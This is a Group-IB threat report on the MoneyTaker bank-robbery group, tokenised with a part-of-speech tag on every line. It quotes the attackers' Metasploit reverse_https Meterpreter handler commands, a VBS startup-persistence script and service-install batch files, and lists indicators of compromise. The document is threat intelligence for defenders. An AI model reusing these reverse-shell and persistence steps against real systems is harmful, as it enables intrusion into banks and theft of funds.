1 CD
MoneyTaker NN
1.5 CD
YEARS NNS
OF IN
SILENT NNP
OPERATIONS NNP
December NNP
2017 CD
www.group-ib.com NN
2 CD
TABLE NN
OF IN
CONTENTS NNP
Summary JJ
Attack NN
infrastructure NN
Provision NN
of IN
the DT
malware NN
survivability NN
Propagation NN
across IN
the DT
network NN
Spying VBG
on IN
legitimate JJ
users NNS
Attack NN
on IN
AWS NNP
CBR NNP
Potential JJ
attacks NNS
on IN
SWIFT NNP
Attack NN
on IN
card NN
processing NN
Using VBG
banking NN
Trojans NNS
Using VBG
POS NNP
Trojans NNPS
Recommendations NNS
Indicators NNS
of IN
compromise NN
3 CD
7 CD
11 CD
12 CD
15 CD
19 CD
25 CD
26 CD
27 CD
28 CD
29 CD
31 CD
SUMMARY CD
01 CD
From NN
May NNP
2016 CD
to TO
November NNP
2017 CD
, ,
at IN
least JJS
20 CD
organisations NNS
were VBD
attacked VBN
in IN
the DT
United NNP
States NNS
, ,
UK NNP
and CC
Russia NNP
. .

At IN
least JJS
one CD
of IN
the DT
US NNP
banks NNS
was VBD
successfully RB
robbed VBN
twice RB
. .

In IN
addition NN
to TO
money NN
, ,
attackers NNS
stole JJ
documentation NN
related VBD
to TO
the DT
interbank NN
payment NN
systems NNS
, ,
which WDT
appear VBP
to TO
have VB
been VBN
obtained VBN
to TO
prepare VB
further JJ
attacks NNS
. .

Based VBN
on IN
analysis NN
of IN
these DT
incidents NNS
, ,
attack NN
tools NNS
and CC
the DT
tactics NNS
applied VBN
, ,
we PRP
have VBP
concluded VBD
that IN
the DT
same JJ
group NN
, ,
which WDT
Group-IB NNP
has VBZ
dubbed VBN
MoneyTaker NNP
( (
after IN
the DT
malware NN
used VBN
) )
is VBZ
behind IN
these DT
attacks NNS
. .

It PRP
is VBZ
interesting VBG
to TO
note VB
that IN
despite IN
the DT
effectiveness NN
of IN
the DT
attacks NNS
, ,
they PRP
have VBP
gone VBN
completely RB
unreported JJ
till NN
now RB
. .

3 CD
Targets NNS
• NN
In IN
total JJ
Group-IB NNP
has VBZ
confirmed VBN
at IN
least JJS
20 CD
companies NNS
as IN
victims NNS
of IN
the DT
MoneyTaker NNP
group NN
, ,
16 CD
of IN
which WDT
are VBP
located VBN
in IN
the DT
US NNP
. .

The DT
vast JJ
majority NN
of IN
them PRP
are VBP
small JJ
community NN
banks NNS
, ,
where WRB
hackers NNS
attacked VBD
card JJ
processing NN
systems NNS
. .

The DT
average JJ
damage NN
from IN
each DT
successful JJ
attack NN
was VBD
500,000 CD
USD NNP
baseline NN
. .

• JJ
Criminals NNP
stole NN
documentation NN
for IN
OceanSystems NNP
’ NNP
FedLink NNP
card NN
processing NN
system NN
, ,
which WDT
is VBZ
used VBN
by IN
200 CD
banks NNS
in IN
Latin NNP
America NNP
and CC
the DT
US NNP
. .

We PRP
believe VBP
that IN
banks NNS
operating VBG
on IN
this DT
infrastructure NN
are VBP
at IN
risk NN
of IN
being VBG
amongst IN
the DT
next JJ
targets NNS
of IN
MoneyTaker NNP
group NN
. .

• NN
In IN
Russia NNP
, ,
they PRP
focus VBP
on IN
attacks NNS
on IN
the DT
system NN
of IN
interbank NN
transfers NNS
AWS NNP
CBR NNP
( (
Russian JJ
Interbank NNP
payment NN
system NN
) )
. .

The DT
average JJ
amount NN
of IN
damage NN
caused VBN
by IN
this DT
theft NN
scheme NN
is VBZ
1.2 CD
million CD
USD NNP
per IN
incident NN
. .

That DT
said VBD
, ,
the DT
affected JJ
banks NNS
managed VBN
to TO
return VB
some DT
portion NN
of IN
the DT
stolen VBN
money NN
. .

Tools NNS
and CC
tactics NNS
Attackers NNS
use VBP
both DT
borrowed NNS
and CC
their PRP$
own JJ
self-written JJ
tools NNS
. .

When WRB
attacking VBG
, ,
hackers NNS
act VBP
creatively RB
and CC
wisely RB
: :
they PRP
use VBP
« JJ
one- NN
time NN
» JJ
infrastructure NN
and CC
carefully RB
erase VB
traces NNS
of IN
their PRP$
activity NN
post-incident NN
. .

Infiltration NN
• NN
To TO
penetrate VB
the DT
corporate JJ
network NN
, ,
the DT
group NN
uses VBZ
legitimate VBP
pen JJ
testing NN
tools NNS
- :
Metasploit NNP
and CC
PowerShell NNP
Empire NNP
. .

• NN
After IN
successful JJ
infection NN
, ,
they PRP
carefully RB
erase VBP
malware NN
traces NNS
. .

However RB
, ,
when WRB
investigating VBG
one CD
of IN
the DT
incidents NNS
, ,
we PRP
managed VBN
to TO
discover VB
the DT
initial JJ
point NN
of IN
compromise NN
: :
hackers NNS
penetrated VBD
the DT
bank NN
’ NNP
s VBZ
internal JJ
network NN
by IN
gaining VBG
access NN
to TO
the DT
home NN
computer NN
of IN
the DT
bank NN
’ NNP
s NN
system NN
administrator NN
. .

Stealthy NNP
techniques NNS
• IN
The DT
group NN
uses VBZ
‘ NNP
fileless NN
’ NNP
malware NN
which WDT
only RB
exists VBZ
in IN
RAM NNP
and CC
is VBZ
removed VBN
on IN
rebooting NN
. .

4 CD
• NN
To TO
protect VB
C NNP
& CC
C NNP
communications NNS
from IN
being VBG
detected VBN
by IN
security NN
teams NNS
, ,
hackers NNS
employ VBP
SSL NNP
certificates NNS
generated VBD
using VBG
names NNS
of IN
well-known JJ
brands NNS
: :
Bank NNP
of IN
America NNP
, ,
Federal NNP
Reserve NNP
Bank NNP
, ,
Microsoft NNP
, ,
Yahoo NNP
, ,
etc NN
. .

• NN
Servers NNS
used VBD
to TO
perform VB
initial JJ
infection NN
are VBP
one-time JJ
components NNS
which WDT
are VBP
changed VBN
immediately RB
after IN
a DT
successful JJ
infection NN
. .

Attack NN
tools NNS
Members NNS
of IN
the DT
group NN
are VBP
skilled VBN
enough RB
to TO
promptly RB
adjust VB
the DT
tools NNS
applied VBD
. .

In IN
some DT
cases NNS
, ,
they PRP
made VBD
changes NNS
to TO
the DT
source NN
code NN
‘ NN
on IN
the DT
fly NN
’ SYM
- :
during IN
the DT
attack NN
. .

Created VBN
tools NNS
Borrowed NNP
tools NNS
MoneyTaker NNP
5.0 CD
- :
malicious JJ
program NN
for IN
auto NN
replacement NN
of IN
payment NN
data NNS
in IN
AWS NNP
CBR NNP
‘ JJ
Screenshotter NNP
’ NNP
and CC
‘ NNP
keylogger NNP
’ NNP
to TO
conduct NN
espionage NN
and CC
capture NN
keystrokes NNS
Metasploit NNP
and CC
PowerShell NNP
Empire NNP
Privilege NNP
escalation NN
tools NNS
, ,
whose WP$
code NN
were VBD
demonstrated VBN
as IN
a DT
Proof NNP
of IN
Concept NNP
at IN
ZeroNights NNP
cybersecurity NN
conference NN
in IN
Moscow NNP
in IN
2016 CD
. .

More JJR
data NNS
provided VBD
later RBR
in IN
this DT
report NN
Moneytaker NNP
‘ NNP
Auto-replacement NNP
’ NN
program NN
to TO
substitute VB
payment NN
details NNS
in IN
the DT
interbank NN
transfer NN
system NN
Citadel NNP
and CC
Kronos NNP
Banking NNP
Trojans NNPS
. .

The DT
latter RB
one CD
was VBD
used VBN
to TO
deliver VB
a DT
Point-of-Sale JJ
( (
POS NNP
) )
malware NN
dubbed VBN
ScanPOS NNP
Tracking VBG
the DT
attacks NNS
• NN
Servers NNS
used VBD
to TO
conduct VB
the DT
attacks NNS
were VBD
specifically RB
configured VBN
to TO
deliver VB
the DT
malicious JJ
payload NN
to TO
a DT
pre- NN
determined JJ
list NN
of IN
IP NNP
addresses VBZ
belonging VBG
to TO
the DT
target NN
company NN
. .

This DT
methodology NN
was VBD
employed VBN
by IN
attackers NNS
to TO
prevent NN
the DT
payload NN
from IN
falling VBG
into IN
the DT
hands NNS
of IN
security NN
analysts NNS
and CC
experts NNS
. .

• NN
After IN
each DT
round NN
of IN
attacks NNS
, ,
hackers NNS
deploy VBP
new JJ
infrastructure NN
for IN
network NN
persistence NN
. .

• NN
In IN
detected JJ
incidents NNS
, ,
criminals NNS
used VBD
a DT
program NN
that WDT
should MD
have VB
carefully RB
removed VBN
all DT
components NNS
of IN
the DT
programs NNS
applied VBN
. .

However RB
, ,
due JJ
to TO
an DT
error NN
made VBN
by IN
the DT
developer NN
, ,
the DT
data NNS
were VBD
not RB
deleted VBN
from IN
the DT
attacked JJ
machines NNS
, ,
which WDT
enabled VBN
forensic JJ
experts NNS
to TO
learn VB
details NNS
of IN
the DT
hackers NNS
’ VBP
activity NN
. .

5 CD
Interrelations NNS
between IN
incidents NNS
In IN
1.5 CD
years NNS
, ,
Group-IB NNP
confirmed VBD
20 CD
incidents NNS
in IN
total NN
. .

Initially RB
we PRP
divided VBD
these DT
incidents NNS
into IN
three CD
groups NNS
and CC
considered VBN
them PRP
as IN
separate NN
. .

However RB
, ,
through IN
in-depth JJ
investigation NN
of IN
the DT
infrastructure NN
, ,
tools NNS
, ,
and CC
tactics NNS
applied VBN
, ,
which WDT
will MD
be VB
further JJ
covered VBN
in IN
this DT
report NN
, ,
we PRP
have VBP
concluded VBN
that IN
one CD
group NN
is VBZ
behind IN
all PDT
these DT
attacks NNS
– VBP
MoneyTaker NNP
. .

This DT
is VBZ
supported VBN
by IN
technical JJ
analysis NN
provided VBD
later RB
in IN
this DT
report NN
: :
Group NNP
1 CD
Group NNP
2 CD
Group NNP
3 CD
17 CD
incidents NNS
in IN
US NNP
and CC
UK NNP
organizations NNS
. .

In IN
the DT
majority NN
of IN
instances NNS
, ,
hackers NNS
used VBD
the DT
same JJ
C NNP
& CC
C NNP
server NN
to TO
control VB
the DT
initial JJ
part NN
of IN
their PRP$
attacks NNS
. .

In IN
some DT
cases NNS
, ,
we PRP
saw VBD
a DT
similar JJ
use NN
of IN
the DT
infrastructure NN
from IN
which WDT
remote VBP
connections NNS
were VBD
performed VBN
using VBG
LogMeIn NNP
. .

Common JJ
features NNS
of IN
Groups NNP
1-3 JJ
2 CD
incidents NNS
occurred VBD
in IN
Russia NNP
in IN
the DT
autumn NN
of IN
2016 CD
. .

The DT
two CD
attacks NNS
occurred VBD
at IN
the DT
same JJ
time NN
; :
in IN
both DT
cases NNS
Meterpreter NNP
was VBD
used VBN
to TO
attack VB
the DT
same JJ
target NN
– JJ
servers NNS
of IN
the DT
Russian JJ
interbank NN
transfer NN
system NN
( (
AWS NNP
CBR NNP
) )
. .

1 CD
incident NN
in IN
Russia NNP
in IN
the DT
autumn NN
of IN
2017 CD
. .

The DT
attack NN
was VBD
conducted VBN
on IN
the DT
AWS NNP
CBR NNP
using VBG
Meterpreter NNP
. .

• NN
Metasploit NNP
used VBD
to TO
infiltrate VB
corporate JJ
networks NNS
• JJ
SSL NNP
certificates NNS
generated VBD
using VBG
popular JJ
brands NNS
to TO
protect VB
traffic NN
between IN
Meterpreter NNP
and CC
C NNP
& CC
C NNP
• JJ
Russian-speaking JJ
attackers NNS
• RB
Own NNP
developers NNS
who WP
create VBP
unique JJ
tools NNS
• JJ
Modification NNP
of IN
the DT
malicious JJ
code NN
during IN
attack NN
• NN
Covering VBG
tracks NNS
of IN
the DT
initial JJ
infection NN
vector NN
• NN
Setting VBG
up RP
forwarding VBG
corporate JJ
emails NNS
to TO
Yandex NNP
and CC
Mail.ru NNP
, ,
free JJ
mail NN
services NNS
. .

Common JJ
features NNS
of IN
Groups NNP
2 CD
and CC
3 CD
• RB
Originally RB
targeted VBN
AWS NNP
CBR NNP
in IN
Russia NNP
• NN
Using VBG
domains NNS
in IN
the DT
.ga NNP
zone NN
• NN
Similar NNP
manner NN
of IN
propagation NN
across IN
the DT
network NN
. .

• IN
The DT
same JJ
hosting NN
service NN
used VBN
in IN
the DT
incidents NNS
in IN
2016 CD
and CC
2017 CD
Common JJ
features NNS
of IN
Groups NNP
1 CD
and CC
2 CD
In IN
both DT
groups NNS
of IN
incidents NNS
, ,
UltraVNC NNP
1.1.9.4 CD
was VBD
used VBN
. .

This DT
version NN
was VBD
available JJ
back RB
in IN
2013 CD
. .

The DT
current JJ
version NN
of IN
this DT
remote NN
access NN
tool NN
was VBD
1.2.0.6 CD
at IN
the DT
time NN
of IN
attacks NNS
in IN
Russia NNP
and CC
the DT
US NNP
. .

6 CD
Software NNP
& CC
service NN
provider NN
, ,
UK NNP
US NNP
Financial NNP
Services NNPS
Provider NN
( (
Breach NNP
not RB
confirmed VBD
) )
Bank NNP
, ,
Russia NNP
Bank NNP
, ,
Russia NNP
AWS NNP
CBR NNP
2016 CD
Bank NNP
, ,
USA NNP
First NNP
Data NNP
STAR NNP
JANUARY NN
FEBRUARY NN
MARCH NN
APRIL NN
MAY NNP
JUNE NN
JULY NN
AUGUST NNP
SEPTEMBER NN
OCTOBER NN
NOVEMBER NN
DECEMBER NN
Bank NNP
, ,
USA NNP
, ,
UT NNP
Bank NNP
, ,
USA NNP
, ,
NY NNP
Bank NNP
, ,
USA NNP
, ,
VA NNP
Bank NNP
, ,
USA NNP
, ,
CO NNP
Bank NNP
, ,
USA NNP
, ,
FL NNP
Bank NNP
, ,
USA NNP
, ,
SC NNP
Credit NNP
Union NNP
, ,
USA NNP
2017 CD
Bank NNP
, ,
USA NNP
, ,
IL NNP
Bank NNP
, ,
USA NNP
, ,
IL NNP
Bank NNP
, ,
USA NNP
, ,
WI NNP
Bank NNP
, ,
USA NNP
, ,
OK NNP
Bank NNP
, ,
Russia NNP
AWS NNP
CBR NNP
JANUARY NN
FEBRUARY NN
MARCH NN
APRIL NN
MAY NNP
JUNE NN
JULY NN
AUGUST NNP
SEPTEMBER NN
OCTOBER NN
NOVEMBER NN
DECEMBER NN
Bank NNP
, ,
USA NNP
, ,
MO NNP
Bank NNP
, ,
USA NNP
, ,
CA NNP
Law NNP
Firm NN
, ,
USA NNP
, ,
NC NNP
Bank NNP
, ,
USA NNP
, ,
CA NNP
Timeline NN
of IN
initial JJ
infections NNS
in IN
attacks NNS
: :
• IN
The DT
very RB
first JJ
attack NN
, ,
which WDT
Group-IB NNP
attributes VBZ
to TO
MoneyTaker NNP
was VBD
conducted VBN
in IN
the DT
spring NN
of IN
2016 CD
, ,
when WRB
funds NNS
were VBD
stolen VBN
from IN
a DT
US NNP
bank NN
by IN
gaining VBG
access NN
to TO
First NNP
Data NNP
’ NNP
s NN
STAR NNP
card NN
processing NN
system NN
. .

• NN
• NN
• NN
In IN
September NNP
2016 CD
, ,
Group-IB NNP
tracked VBD
several JJ
attacks NNS
on IN
banks NNS
in IN
Russia NNP
. .

The DT
main JJ
target NN
was VBD
the DT
AWS NNP
CBR NNP
( (
Automated NNP
Work NNP
Station NNP
Client NNP
of IN
the DT
Russian JJ
Central NNP
Bank NNP
) )
, ,
a DT
Russian JJ
interbank NN
fund NN
transfer NN
system NN
similar JJ
to TO
SWIFT NNP
. .

After IN
a DT
successful JJ
theft NN
from IN
one CD
of IN
the DT
attacked JJ
banks NNS
, ,
the DT
incidents NNS
stopped VBD
, ,
similar JJ
to TO
the DT
case NN
of IN
theft NN
in IN
the DT
United NNP
States NNPS
. .

In IN
November NNP
2016 CD
, ,
attackers NNS
deployed VBD
new JJ
infrastructure NN
, ,
which WDT
was VBD
then RB
used VBN
to TO
attack VB
banks NNS
in IN
the DT
United NNP
States NNPS
. .

The DT
last JJ
activity NN
in IN
this DT
wave NN
of IN
attacks NNS
was VBD
tracked VBN
in IN
June NNP
2017 CD
. .

In IN
November NNP
2017 CD
, ,
we PRP
observed VBD
a DT
new JJ
successful JJ
attack NN
by IN
this DT
group NN
in IN
Russia NNP
. .

Like IN
in IN
2016 CD
, ,
they PRP
managed VBD
to TO
steal VB
funds NNS
through IN
the DT
interbank NN
transfers NNS
system NN
. .

7 CD
02 CD
ATTACK NN
INFRASTRUCTURE NN
To TO
conduct VB
targeted JJ
attacks NNS
, ,
hackers NNS
use VBP
a DT
distributed JJ
infrastructure NN
that WDT
is VBZ
difficult JJ
to TO
track VB
. .

A DT
rather RB
unique JJ
feature NN
of IN
the DT
infrastructure NN
is VBZ
the DT
presence NN
of IN
a DT
Persistence NN
server NN
, ,
which WDT
delivers VBZ
the DT
payload NN
only RB
to TO
real JJ
victims NNS
whose WP$
IP NNP
addresses NNS
are VBP
added VBN
to TO
the DT
whitelist NN
. .

1 CD
2 CD
3 CD
4 CD
5 CD
Stager NNP
request NN
payload NN
Payload NN
Setup NNP
encrypted VBD
tunnel NN
with IN
backconnect NN
Request NNP
stager NN
after IN
reboot NN
Response NN
with IN
stager NN
if IN
IP NNP
in IN
whitelist NN
Pentest NNP
framework NN
and CC
backconnect VB
server NN
Persistence NN
server NN
( (
response NN
to TO
whitelisted VBN
IPs NNP
) )
VICTIM NN
Pentest NNP
framework NN
server NN
This DT
server NN
is VBZ
used VBN
to TO
perform VB
the DT
main JJ
activity NN
. .

On IN
it PRP
, ,
hackers NNS
install VB
a DT
legitimate JJ
tool NN
for IN
penetration NN
testing VBG
- :
Metasploit NN
to TO
further RB
control VB
the DT
full JJ
attack NN
. .

8 CD
Name NN
asys.exe NN
launch-paranoid- NN
stageless3.exe NN
SHA256 NN
Type NN
6ce7c4cb9e51116a4565e9b2e129335a4d23cfc51a32080aa9f25689cb1c6ef2 CD
Meterpreter NN
f98b0220a11b57e3c812e7f86f5e5c3f8bbdb5d5ce9dc7b721e28a7f28ecb1ef NN
Meterpreter NN
msc.exe NN
, ,
msc3.exe NN
0b778857bbc4ec36020d021f475ff90550134beb9506c53071652421e10ddfff CD
Meterpreter NN
msc4.exe NN
msc5.exe NN
msc6.exe NN
msc7.exe NN
cmd.exe NN
53c789565821b6eb64bd7f002e38b8259bde3bbbb39798c82657b2b5d59bcd9f CD
Meterpreter NN
98fb846df3687b3c9c7fa66f39d6c70948e8330489be7c787e1f2c3b23f8d205 CD
Meterpreter NN
92afe22f494a849345b18d2b302e71a4336871a7956795a7188280e4c7bd8607 CD
Meterpreter NN
73b8ed8f14ec2260ae332603f723a5eb0a52c4c997454904e3d5ff254a27a6e6 CD
Meterpreter NN
7eef88e4b0d5ad549d18629f4491088d5d328d7bcaab8ce68216a331b284d43f CD
Meterpreter NNP
stager NN
mencstager.exe NN
7eef88e4b0d5ad549d18629f4491088d5d328d7bcaab8ce68216a331b284d43f CD
Meterpreter NNP
stager NN
msdefender.bat NN
8cfeb71eaaa3df217e15a449bc4656841b58a4737760d956b1c8e6039cff61e6 CD
Meterpreter NNP
stager NN
se.vbs NN
rc4.dll NN
rc4.exe NN
rc4.hta NN
ff999c968bce81987cab47a02a3b176042489d82644d4c6fb13d5c8c1244cbcc NN
Meterpreter NNP
stager NN
8a0be0a97ba19d4498b58365d36ba5461039e41f73bbd745b15b80fc21e38c3f CD
Meterpreter NNP
stager NN
a7035c20c32ad4cd1cc76b211f6258fc5858e4bc43031d04e3655b38b666c0c4 NN
Meterpreter NNP
stager NN
72ee03b51544002df3e25d1a730e650389bdbd5f1cff91488ed9e05944b3cb52 CD
Meterpreter NNP
stager NN
proxystager.bat NN
3a163bb0a8abe244815836a05fab48b640ec537bd76c92b7857db18657d2a774 CD
Meterpreter NNP
stager NN
ps.bat NN
9e9149ae6092c4a5bd4cb36cf40ec660e3ee10e76834340bf1234186315ca808 CD
Meterpreter NNP
stager NN
When WRB
the DT
payload NN
( (
Meterpreter NNP
) )
runs VBZ
on IN
a DT
compromised JJ
host NN
, ,
it PRP
initiates NNS
outbound RP
SSL NNP
connections NNS
which WDT
helps VBZ
to TO
avoid VB
detection NN
of IN
suspicious JJ
connections NNS
by IN
network NN
security NN
systems NNS
. .

Below NNP
is VBZ
code NN
executed VBD
within IN
the DT
Metasploit NNP
console NN
by IN
the DT
attacker NN
: :
use NN
exploit/multi/handler NN
set VBN
PAYLOAD NNP
windows/meterpreter/reverse JJ
_ NNP
https NN
set VBN
LHOST NNP
_ NNP
c2serverIP NN
_ NN
set VBN
LPORT NNP
443 CD
set VBN
HandlerSSLCert NNP
/root/.msf4/loot/20161031010327 NNP
_ NN
default NN
_ $
46.228.47.114 CD
_ NNP
www.yahoo.com NN
_ NNP
pe NN
_ VBD
399345.pem CD
set VBN
StagerVerifySSLCert NNP
true JJ
set VBN
EnableStageEncoding NNP
true JJ
set VBN
StageEncoder NNP
x86/shikata NNP
_ NNP
ga NN
_ NNP
nai NN
set VBN
ExitOnSession NNP
false JJ
By IN
default NN
, ,
Metasploit NNP
generates VBZ
self-signed JJ
SSL NNP
certificates NNS
and CC
specifies NNS
random VBP
values NNS
in IN
the DT
following JJ
fields NNS
: :
Valid NNP
from IN
, ,
Valid NNP
till NN
, ,
Common NNP
name NN
. .

Such JJ
certificates NNS
can MD
also RB
cause VB
suspicion NN
. .

9 CD
In IN
order NN
to TO
avoid VB
detection NN
, ,
the DT
MoneyTaker NNP
group NN
generates VBZ
self- JJ
signed VBN
SSL NNP
certificates NNS
before IN
the DT
attack NN
, ,
indicating VBG
the DT
names NNS
of IN
popular JJ
brands NNS
in IN
the DT
fields NNS
, ,
instead RB
of IN
filling VBG
them PRP
out RP
randomly RB
. .

Group-IB JJ
specialists NNS
have VBP
discovered VBN
the DT
use NN
of IN
the DT
following VBG
certificates NNS
: :
Issuer NN
SSL NNP
fingerprint NN
IP NNP
, ,
where WRB
SSL NNP
was VBD
used VBN
MetaBank NNP
LTD NNP
8b7fa4ef88a303bb47240c9b8012c80507074f2e CD
83.220.172.71 CD
Yahoo NNP
Inc NNP
. .
c29d79df9b5416fd416c31e57cd525dfc23a8f66 NN
37.46.133.190 CD
172.86.121.11 CD
Fiserv NNP
Inc NNP
Microsoft NNP
Ltd NNP
b3dd855fc1b32757bde5c9f737808f150d6f57e6 NN
146.185.243.19 CD
98cbe44e1a30448a3ff6be38e8b277ae189f9b45 CD
82.146.54.5 CD
Federal NNP
Reserve NNP
Bank NNP
5fe7f5924ee2382dbfa5c8bdc6d04f0ff5d9273a CD
188.120.235.201 CD
Bank NNP
of IN
America NNP
5922a06f03f6464921462c07842afb18da1577e9 CD
188.120.230.218 CD
188.120.230.235 CD
VMware NN
7aa02d827609e0b6b3dca6d0ef82fe3a1fbe1d67 CD
185.141.25.222 CD
Persistence NN
server NN
Hackers NNS
try VBP
to TO
stay VB
as RB
inconspicuous JJ
as IN
possible JJ
, ,
and CC
therefore RB
they PRP
use VBP
‘ JJ
fileless NN
’ NNP
malware NN
which WDT
only RB
exists VBZ
in IN
RAM NNP
and CC
is VBZ
destroyed VBN
after IN
reboot NN
. .

That DT
said VBD
, ,
PowerShell NNP
and CC
VBS NNP
scripts NNS
help VBP
them PRP
to TO
ensure VB
persistence NN
in IN
the DT
system NN
. .

Scripts NNP
provide VBP
the DT
following JJ
benefits NNS
for IN
attackers NNS
: :
• RB
Malicious JJ
scripts NNS
are VBP
hard JJ
to TO
detect VB
by IN
means NNS
of IN
antivirus NN
protection NN
. .

Writing VBG
a DT
signature NN
for IN
a DT
script NN
without IN
false JJ
positives NNS
is VBZ
much RB
more RBR
difficult JJ
than IN
a DT
binary JJ
file NN
. .

• NN
Scripts NNS
are VBP
easy JJ
to TO
modify VB
, ,
which WDT
makes VBZ
it PRP
easier JJR
for IN
attackers NNS
to TO
work VB
. .

• NN
It PRP
is VBZ
easy JJ
to TO
ensure VB
persistence NN
. .

Typically RB
, ,
such JJ
scripts NNS
are VBP
stored VBN
in IN
the DT
registry NN
or CC
are VBP
called VBN
when WRB
certain JJ
events NNS
occur VBP
through IN
Windows NNP
Management NNP
Instrumentation NNP
( (
WMI NNP
) )
, ,
Group NNP
Policy NN
Objects NNP
( (
GPOs NNP
) )
, ,
Scheduled VBN
task NN
. .

Such JJ
scripts NNS
are VBP
very RB
simple NN
and CC
usually RB
their PRP$
main JJ
task NN
is VBZ
to TO
download VB
the DT
main JJ
program NN
from IN
an DT
external JJ
or CC
local JJ
source NN
and CC
run VB
it PRP
. .

10 CD
The DT
Persistence NNP
server NN
is VBZ
used VBN
to TO
force VB
a DT
malicious JJ
file NN
to TO
be VB
launched VBN
if IN
the DT
attacked VBN
computer NN
has VBZ
been VBN
rebooted VBN
. .

A DT
distinctive JJ
feature NN
of IN
this DT
group NN
is VBZ
the DT
use NN
of IN
a DT
separate JJ
server NN
for IN
this DT
goal NN
. .

On IN
the DT
server NN
, ,
they PRP
run VBP
a DT
script NN
that WDT
performs VBZ
two CD
checks NNS
: :
1 CD
. .

Checks NNS
if IN
the DT
User-agent JJ
field NN
is VBZ
equal JJ
to TO
WinHttp NNP
. .

If IN
it PRP
is VBZ
not RB
equal JJ
, ,
requests NNS
are VBP
sent VBN
back RB
to TO
the DT
web NN
server NN
with IN
a DT
404 CD
error NN
code NN
( (
page NN
not RB
found VBN
) )
. .

If IN
equal JJ
to TO
WinHttp NNP
, ,
it PRP
performs VBZ
the DT
second JJ
check NN
. .

2 CD
. .

Checks NNS
if IN
the DT
IP NNP
address NN
from IN
which WDT
the DT
request NN
is VBZ
made VBN
is VBZ
on IN
the DT
white JJ
list NN
. .

If IN
yes NNS
, ,
then RB
the DT
malicious JJ
file NN
mencstager.exe NN
is VBZ
delivered VBN
. .

If IN
not RB
, ,
rundll32.exe NN
is VBZ
transferred VBN
. .

51138beea3e2c21e CD
c44d0932c71762a8 NN
– VBZ
a DT
legitimate JJ
Windows NNP
file NN
. .

This DT
verification NN
complicates VBZ
investigative JJ
activity NN
of IN
researchers NNS
who WP
can MD
not RB
get VB
the DT
malicious JJ
file NN
because IN
they PRP
try VBP
to TO
download VB
it PRP
from IN
an DT
IP NNP
address NN
that WDT
is VBZ
not RB
on IN
the DT
white JJ
list NN
. .

11 CD
PROVISION NN
OF IN
THE NNP
MALWARE NNP
SURVIVABILITY NN
03 CD
Unlike IN
other JJ
groups NNS
conducting VBG
targeted JJ
attacks NNS
, ,
MoneyTaker NNP
uses NNS
standard VBP
techniques NNS
to TO
provide VB
malware NN
survivability NN
in IN
the DT
system NN
. .

Researchers NNS
have VBP
not RB
managed VBN
to TO
recover VB
the DT
full JJ
picture NN
of IN
the DT
incidents NNS
that WDT
occurred VBD
in IN
the DT
autumn NN
of IN
2016 CD
in IN
Russia NNP
, ,
because IN
tracks NNS
of IN
successful JJ
attacks NNS
were VBD
carefully RB
removed VBN
. .

However RB
, ,
Group-IB NNP
has VBZ
discovered VBN
that IN
hackers NNS
infiltrated VBD
the DT
network NN
of IN
a DT
Russian JJ
bank NN
by IN
gaining VBG
access NN
to TO
the DT
home NN
computer NN
of IN
the DT
bank NN
’ NNP
s NN
system NN
administrator NN
. .

One CD
of IN
the DT
methods NNS
to TO
ensure VB
malware NN
survivability NN
in IN
the DT
system NN
was VBD
the DT
creation NN
of IN
services NNS
using VBG
.bat NN
scripts NNS
that WDT
launched VBD
the DT
VNC NNP
server NN
. .

The DT
contents NNS
of IN
the DT
at1.bat NN
file NN
: :
« JJ
c NN
: :
\Program JJ
Files\Cisco NNP
Systems\VPN NNP
Client\hostsec32.exe NNP
» NN
-install DT
« VBZ
Host NNP
Security NNP
Server NNP
» NN
The DT
contents NNS
of IN
the DT
at2.bat NN
file NN
: :
« JJ
c NN
: :
\Program JJ
Files\Cisco NNP
Systems\VPN NNP
Client\hostsec32.exe NNP
» NN
-uninstall DT
« VBZ
host NN
security NN
server NN
» NN
These DT
batch NN
files NNS
were VBD
called VBN
from IN
Windows NNP
Task NNP
Scheduler NNP
. .

In IN
US NNP
incidents NNS
, ,
the DT
attacker NN
used VBN
VBS NNP
scripts NNS
that WDT
created VBD
a DT
link NN
named VBN
« JJ
Task NNP
Scheduler NNP
» NNP
for IN
a DT
specific JJ
user NN
in IN
the DT
startup NN
to TO
launch VB
the DT
malicious JJ
file NN
. .

Set NNP
oWS MD
= VB
WScript.CreateObject NNP
( (
« NNP
WScript.Shell NNP
» NNP
) )
sLinkFile JJ
= NNP
« NNP
C NNP
: :
\Users\ JJ
< CD
% NN
username JJ
% NN
> NNP
\AppData\Roaming\Microsoft\ NN
Windows\Start NNP
Menu\Programs\Startup\taskhost.lnk NNP
» NN
Set NNP
oLink VBP
= JJ
oWS.CreateShortcut NN
( (
sLinkFile NN
) )
oLink.TargetPath NN
= NN
« NNP
C NNP
: :
\Users\ JJ
< CD
% NN
username JJ
% NN
> NNP
\AppData\Local\ NN
Temp\taskhost.exe NNP
» NN
‘ JJ
oLink.Arguments NNS
= VBP
« CD
» NN
‘ JJ
oLink.Description NN
= NNP
« NNP
Task NNP
Scheduler NNP
» NN
‘ NN
oLink.HotKey MD
= VB
« NNP
ALT+CTRL+F NNP
» NN
‘ JJ
oLink.IconLocation NN
= NNP
« NNP
C NNP
: :
\Users\ JJ
< CD
% NN
username JJ
% NN
> NNP
\AppData\Local\ NN
Temp\taskhost.exe NNP
, ,
2 CD
» NN
‘ JJ
oLink.WindowStyle JJ
= NNP
« NNP
1 CD
» NN
‘ JJ
oLink.WorkingDirectory NN
= NNP
« NNP
C NNP
: :
\Users\ JJ
< CD
% NN
username JJ
% NN
> NNP
\AppData\ NN
Local\Temp NNP
» NN
oLink.Save NN
12 CD
04 CD
PROPAGATION NNP
ACROSS NNP
THE DT
NETWORK NNP
After IN
successfully RB
infecting VBG
one CD
of IN
the DT
computers NNS
and CC
gaining VBG
initial JJ
access NN
to TO
the DT
system NN
, ,
the DT
attacker NN
performs VBZ
reconnaissance NN
of IN
the DT
local JJ
network NN
in IN
order NN
to TO
gain VB
domain NN
administrator NN
privileges NNS
and CC
eventually RB
consolidate VB
control NN
over IN
the DT
network NN
. .

Hackers NNS
use VBP
the DT
Metasploit NNP
tool NN
to TO
conduct VB
network NN
reconnaissance NN
, ,
search NN
for IN
vulnerable JJ
applications NNS
, ,
exploit VB
vulnerabilities NNS
, ,
escalate VBP
systems NNS
privileges NNS
, ,
and CC
collect VB
information NN
. .

Gaining VBG
admin NN
privileges NNS
To TO
escalate VB
privileges NNS
up RB
to TO
the DT
local JJ
administrator NN
( (
or CC
“ VB
SYSTEM NNP
” VB
local JJ
user NN
) )
, ,
attackers NNS
use VBP
exploit JJ
modules NNS
from IN
the DT
standard NN
Metasploit NNP
